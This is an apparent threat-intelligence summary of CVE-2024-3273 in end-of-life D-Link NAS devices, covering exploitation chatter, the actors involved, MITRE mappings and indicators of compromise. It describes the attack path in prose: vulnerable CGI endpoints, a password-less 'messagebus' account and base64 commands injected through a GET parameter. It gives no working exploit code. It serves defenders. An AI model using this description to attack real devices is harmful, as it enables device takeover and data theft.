CVE-2024-3273 is a critical command-injection vulnerability impacting end-of-life D-Link NAS devices, enabling remote control and potential data theft or device takeover. Active exploitation is being discussed on underground forums, with threat actors linked to Russia and China, including Camaro Dragon (Mustang Panda) and Volt Typhoon, and Mirai-based activity observed against vulnerable devices. #CVE-2024-3273 #D-LinkNAS #MustangPanda #VoltTyphoon #Mirai #DNS-320L
Keypoints
- CVE-2024-3273 is a critical vulnerability affecting end-of-life D-Link NAS devices, with a CVSS base score of 9.8 and the potential for unauthorized access, data theft, or DoS.
- Threat actors on underground forums are actively discussing the flaw and sharing IP addresses of affected devices, indicating active exploitation activity.
- CYFIRMA identified 90,446 publicly accessible D-Link NAS instances, with 54,845 unique IPs potentially vulnerable to this flaw.
- The exploit targets CGI binaries nas_sharing.cgi and orospucoc.cgi, using a pre-configured system user named messagebus with no password to gain access.
- Attack payloads are delivered via HTTP GET requests with base64-encoded data injected into the system parameter, enabling arbitrary commands to run on the device.
- Mirai malware has been observed in attacks against vulnerable D-Link NAS devices, and there is discussion about selling PoCs and TTPs on the Deep/Dark Web.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The vulnerability can be exploited remotely through CGI interfaces to take control of the device. ‘CVE-2024-3273 allows remote attackers to take control of end-of-life (EOL) network-attached storage (NAS) devices’
- [T1068] Exploitation for Privilege Escalation – The flaw lets attackers gain root privileges on vulnerable devices. ‘The vulnerability allows remote attackers to take control of affected devices due to hardcoded, password-less credentials’
- [T1078] Valid Accounts – Attackers leverage a pre-configured system user with no password to access the device. ‘a pre-configured system user named messagebus, which has no password’
- [T1059] Command and Scripting Interpreter – Exploitation occurs by executing commands via CGI and system parameters. ‘execute arbitrary commands on the system’
- [T1027] Obfuscated/Compressed Files and Information – Payloads are base64-encoded in HTTP requests to conceal commands. ‘payload is base64 encoded and injected into the URL’
Indicators of Compromise
- [IP Address] – Malicious IPs observed targeting D-Link NAS vulnerabilities: 195.1.144.109, 80.94.92.60, 45.142.182.70
- [URL/Endpoint] – Exploit CGI endpoints used in attacks: /cgi-bin/nas_sharing.cgi, /cgi-bin/orospucoc.cgi, and /.most/orospucoc.cgi